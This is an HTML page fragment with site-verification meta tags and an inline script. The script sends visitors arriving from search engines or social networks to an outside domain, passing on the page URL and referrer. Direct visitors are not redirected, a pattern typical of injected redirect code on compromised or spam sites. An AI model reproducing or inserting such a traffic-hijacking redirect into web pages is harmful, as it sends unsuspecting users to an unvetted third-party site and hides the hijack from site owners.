<meta name="google-site-verification" content="SJkYOy8waQ-wqttM3ntj6p-JgOukDwxomGRBTs0O_H0" />
<meta name="msvalidate.01" content="3A46B2D12363E842A2ADDC8236AB7301" />
<script>
  //<![CDATA[
var ars = 'https://usakunekunes.com';

if(['.google.', 'bing.', 'yandex.', 'facebook.', 'pinterest.'].some(s => document.referrer.toLowerCase().includes(s)) || ['fb', 'facebook', 'pinterest', 'twitter'].some(s => navigator.userAgent.toLowerCase().includes(s))){ window.location.href = ars + '/?arsae='+ encodeURIComponent(window.location.href) + '&arsae_ref='+ encodeURIComponent(document.referrer) }
//]]>
</script>

<!--ads/responsive.txt-->
